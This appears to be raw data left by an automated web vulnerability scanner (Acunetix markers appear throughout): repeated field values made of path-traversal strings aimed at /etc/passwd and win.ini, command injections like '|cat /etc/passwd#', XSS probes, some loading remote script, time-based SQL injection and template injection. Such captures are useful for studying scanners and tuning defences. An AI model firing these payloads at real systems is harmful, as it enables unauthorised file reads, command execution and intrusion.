`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<body onload=prompt(933482)>

-1)

1

|cat /etc/passwd#

1

1

-1))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929378)>

1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

'|'ld

1&n992076=v907456

1

gVpdhhNT'

1<img src=xyz OnErRor=prompt(924332)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

1<img/src=">" onerror=alert(947978)>

i003gBa5')

1

"|"ld

'"()

^(#$!@#$)(()))******

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt%20>prompt(971033)</sCripT>

OKuJSsen'))

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

-1

1&lt

/etc/passwd

"

1

1

1

\xf6<img acu onmouseover=prompt(944227) //\xf6>

"

1

-1)

1

1

http://hitTrCQskpUxA.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1<input autofocus onfocus=prompt(914881)>

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1))

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

j8O9qDK3'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

1

pB3D9EsK')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'"

comments

[url=http://www.acunetix.com]website security[/url]

'&dir&'

1

1

9fSP1T8N'))

1'"()&%<ScRiPt >prompt(994445)</ScRiPt>

comments/.

<!--

1

1

1

"&dir&"

file:///etc/passwd

1_uveE8 <ScRiPt >prompt(978881)</ScRiPt>

1

1

1

'"()&%<ScRiPt >prompt(917287)</ScRiPt>

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1_970856

1

1

1

'|dir

1

WEB-INF/web.xml

1

1

1

"|dir

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

acu8219\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8219

1

1

1

acux2583\xc0\xbez1\xc0\xbcz2a\x90bcxuca2583

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(995714)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(949919)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(919245)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900717></ScRiPt>

1

1

1<ScRiPt >prompt(974196)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(913357)">

WEB-INF/web.xml

1

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945665)"></g></svg>

1

1<div style=width:expression(prompt(925936))>

1

1

1

1<iframe src='data:text/html

1

1

1<body onload=prompt(920489)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987143)>

1

1

1<img src=xyz OnErRor=prompt(962547)>

1

1<img/src=">" onerror=alert(937984)>

1

1

1<ScRiPt%20>prompt(972628)</sCripT>

1

1

1&lt

\xf6<img acu onmouseover=prompt(981367) //\xf6>

1

1<input autofocus onfocus=prompt(909168)>

<a href='http://www.acunetix.com'>website security</a>

[url=http://www.acunetix.com]website security[/url]

1

1_2LMFV <ScRiPt >prompt(913785)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9467884*9538537)

1

'+response.write(9467884*9538537)+'

1

"+response.write(9467884*9538537)+"

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

`cat /etc/passwd`

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

${99409+99001}

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

-1

)

1some_inexistent_file_with_long_name%00.jpg

1&n977916=v955438

1

'|'ld

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

-1))

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

p2L1GEYn'

'

1

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

J4SlJZx7')

1

1

1

1

1

YZS4sU7T'))

/etc/passwd

"

${@print(md5(acunetix_wvs_security_test))}

1

http://hitumfymOtJ8m.bxss.me/

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

-1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

1

http://www.acunetix.tst

1

1

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

&dir

1

comments

1'"()&%<ScRiPt >prompt(949539)</ScRiPt>

-1))

1

<!--

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"()&%<ScRiPt >prompt(999482)</ScRiPt>

6rbffKbN'

comments

1

MK6lXjPf')

1_973410

1

1

comments/.

'&dir&'

7ePdQYCC'))

1

1

file:///etc/passwd

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

|dir

WEB-INF/web.xml

1

'|dir

WEB-INF\web.xml

1

"|dir

../../../../../../../../../../windows/win.ini

acu7458\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7458

1

1

1

acux2041\xc0\xbez1\xc0\xbcz2a\x90bcxuca2041

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(925613)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(940587)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(994152)</ScRiPt>

1

1

1

................windowswin.ini

response.write(9497911*9861273)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?991028></ScRiPt>

1

1

'+response.write(9497911*9861273)+'

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(905796)</ScRiPt>

1

1

"+response.write(9497911*9861273)+"

SomeCustomInjectedHeader:injected_by_wvs

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(944202)">

&cat /etc/passwd&

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989840)"></g></svg>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(946993))>

1

1

1

1

"&cat /etc/passwd&"

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3.234),0)/*'XOR(if(now()=sysdate(),sleep(3.234),0))OR'"XOR(if(now()=sysdate(),sleep(3.234),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

(select(0)from(select(sleep(3.234)))v)/*'+(select(0)from(select(sleep(3.234)))v)+'"+(select(0)from(select(sleep(3.234)))v)+"*/

1<body onload=prompt(924002)>

1

${99808+99414}

1

1

`cat /etc/passwd`

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930561)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(929723)>

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1&n907076=v992295

'|'ld

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img/src=">" onerror=alert(974616)>

1

ZCdWGsfm'

!(()&&!|*|*|

1

1

"|"ld

YEMi3TYq')

1<ScRiPt%20>prompt(973213)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

1

ceVnWs3Y'))

^(#$!@#$)(()))******

1&lt

/etc/passwd

1

1

-1

'"()

'

\xf6<img acu onmouseover=prompt(966110) //\xf6>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

'

"

1<input autofocus onfocus=prompt(938626)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1))

1

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

"

1

1

&dir

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r4nrLX0N'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

http://hitqjuo7QZyW4.bxss.me/

'&dir&'

1

45vLI6o4')

acunetix_wvs_invalid_filename

1_h42VY <ScRiPt >prompt(966716)</ScRiPt>

1

1

"&dir&"

DA0HPgR3'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

file:///etc/passwd

1

1

comments

|dir

1

1

1

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

comments

1

'"

'|dir

1'"()&%<ScRiPt >prompt(922127)</ScRiPt>

comments/.

1

1

WEB-INF/web.xml

1

1

"|dir

<!--

1

WEB-INF\web.xml

1

1

'"()&%<ScRiPt >prompt(978083)</ScRiPt>

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1_970052

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

acu2948\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2948

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux10905\xc0\xbez1\xc0\xbcz2a\x90bcxuca10905

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(979657)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<script>prompt(927064)</script>

1

1

1<ScRiPt >prompt(919121)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943018></ScRiPt>

WEB-INF/web.xml

1

response.write(9370088*9683199)

1

1<ScRiPt >prompt(979952)</ScRiPt>

'+response.write(9370088*9683199)+'

WEB-INF\web.xml

1

1

"+response.write(9370088*9683199)+"

1<video><source onerror="javascript:prompt(937042)">

&cat /etc/passwd&

1

1

1

1

'&cat /etc/passwd&'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919472)"></g></svg>

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(964112))>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

1<body onload=prompt(902615)>

SomeCustomInjectedHeader:injected_by_wvs

${99727+100137}

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

`cat /etc/passwd`

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928815)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img src=xyz OnErRor=prompt(926837)>

1&n985097=v980016

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1

1<img/src=">" onerror=alert(924224)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

)

-1))

"|"ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

1<ScRiPt%20>prompt(941754)</sCripT>

1

t6Vbwa4K'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

'

1&lt

1

1

1

/etc/passwd

^(#$!@#$)(()))******

'

1

xxhhoNlY')

"

1

1

\xf6<img acu onmouseover=prompt(955945) //\xf6>

1

1

"

${@print(md5(acunetix_wvs_security_test))}

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Ssbnze9z'))

1

1

1<input autofocus onfocus=prompt(998395)>

http://hitbTvt64yfhg.bxss.me/

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

comments

<a href='http://www.acunetix.com'>website security</a>

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

1

'&dir&'

http://www.acunetix.tst

comments

[url=http://www.acunetix.com]website security[/url]

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'"

1

-1))

<!--

1

1_2IWCM <ScRiPt >prompt(900920)</ScRiPt>

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(966573)</ScRiPt>

1

1

1

1

Fvt4y9dH'

file:///etc/passwd

|dir

1

1

'"()&%<ScRiPt >prompt(937772)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

FfdHQmn9')

1

1

'|dir

1

1

cgs6WtWZ'))

1_987758

1

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu3802\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3802

1

1

..\..\..\..\..\..\..\..\windows\win.ini

acux9974\xc0\xbez1\xc0\xbcz2a\x90bcxuca9974

1

1<ScRiPt >prompt(993984)</ScRiPt>

response.write(9886185*9403982)

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(937731)</script>

1

1

'+response.write(9886185*9403982)+'

1<ScRiPt >prompt(940410)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9886185*9403982)+"

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?915516></ScRiPt>

1

1

1

1<ScRiPt >prompt(950993)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1

1

1

1

1

1<video><source onerror="javascript:prompt(981746)">

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(966664)"></g></svg>

${100499+99150}

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

1

1<div style=width:expression(prompt(971751))>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF\web.xml

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1&n929874=v957380

)

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(919013)>

1

1

1

1

-1

!(()&&!|*|*|

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919258)>

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

-1)

1

'|'ld

testasp.vulnweb.com

1<img src=xyz OnErRor=prompt(978837)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

"|"ld

'"()

'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

rhRXBMaP'

1<img/src=">" onerror=alert(963737)>

1

1

"

1

'

1<ScRiPt%20>prompt(990196)</sCripT>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

RZTOe5AD')

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

1&lt

1

1

aG9WZH4W'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

\xf6<img acu onmouseover=prompt(939136) //\xf6>

1

1

acunetix_wvs_invalid_filename

1

1

-1

http://hit9F5EY41u1a.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

1<input autofocus onfocus=prompt(909433)>

1

&dir

1

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

<a href='http://www.acunetix.com'>website security</a>

1

-1))

http://www.acunetix.tst

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

ABPWxlDy'

1

1

'&dir&'

[url=http://www.acunetix.com]website security[/url]

'"

1

ReMUen3Y')

1'"()&%<ScRiPt >prompt(977045)</ScRiPt>

1

<!--

"&dir&"

1_BqYmq <ScRiPt >prompt(949457)</ScRiPt>

1

1

1

'"()&%<ScRiPt >prompt(934484)</ScRiPt>

file:///etc/passwd

ygtr29qF'))

1

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_954234

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu9208\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9208

1

1

1

................windowswin.ini

1

acux4417\xc0\xbez1\xc0\xbcz2a\x90bcxuca4417

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(992085)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9680595*9136954)

1

1

1<script>prompt(974216)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9680595*9136954)+'

1<ScRiPt >prompt(983993)</ScRiPt>

&cat /etc/passwd&

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958421></ScRiPt>

1

"+response.write(9680595*9136954)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1<ScRiPt >prompt(951260)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<video><source onerror="javascript:prompt(992323)">

1

1

cat /etc/passwd

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944624)"></g></svg>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

|cat /etc/passwd#

1

${100178+99988}

1<div style=width:expression(prompt(980284))>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

-1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n900964=v932983

1some_inexistent_file_with_long_name%00.jpg

)

1<iframe src='data:text/html

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<body onload=prompt(925348)>

!(()&&!|*|*|

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

pyZYPFuj'

'"()

1

^(#$!@#$)(()))******

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928569)>

'

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

GTXRXFei')

1<img src=xyz OnErRor=prompt(966234)>

1

1

"

1

b94kt79B'))

1

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

1<img/src=">" onerror=alert(937452)>

${@print(md5(acunetix_wvs_security_test))}

1

1

-1

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1<ScRiPt%20>prompt(906184)</sCripT>

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

-1)

http://hit50wRu6qR4F.bxss.me/

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1&lt

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

comments

'&dir&'

-1))

1

\xf6<img acu onmouseover=prompt(903131) //\xf6>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments/.

1<input autofocus onfocus=prompt(929628)>

"&dir&"

'"

fNtsAIF4'

http://www.acunetix.tst

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

NlFa8uCz')

<!--

|dir

1

1

1

[url=http://www.acunetix.com]website security[/url]

1'"()&%<ScRiPt >prompt(967678)</ScRiPt>

z0vKbmGi'))

1

'|dir

1

1

1

1_PwApl <ScRiPt >prompt(933621)</ScRiPt>

1

'"()&%<ScRiPt >prompt(971206)</ScRiPt>

file:///etc/passwd

1

1

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_955153

1

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu3981\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3981

1

1

................windowswin.ini

acux3516\xc0\xbez1\xc0\xbcz2a\x90bcxuca3516

1

1

1<ScRiPt >prompt(945452)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(931455)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9261944*9330615)

1<ScRiPt >prompt(950764)</ScRiPt>

1

'+response.write(9261944*9330615)+'

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?918664></ScRiPt>

1

1

"+response.write(9261944*9330615)+"

1

&cat /etc/passwd&

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(982972)</ScRiPt>

../../../../../../../../../../etc/passwd

1

1

1

'&cat /etc/passwd&'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<video><source onerror="javascript:prompt(966853)">

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913305)"></g></svg>

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

WEB-INF/web.xml

1

1

1

1

1

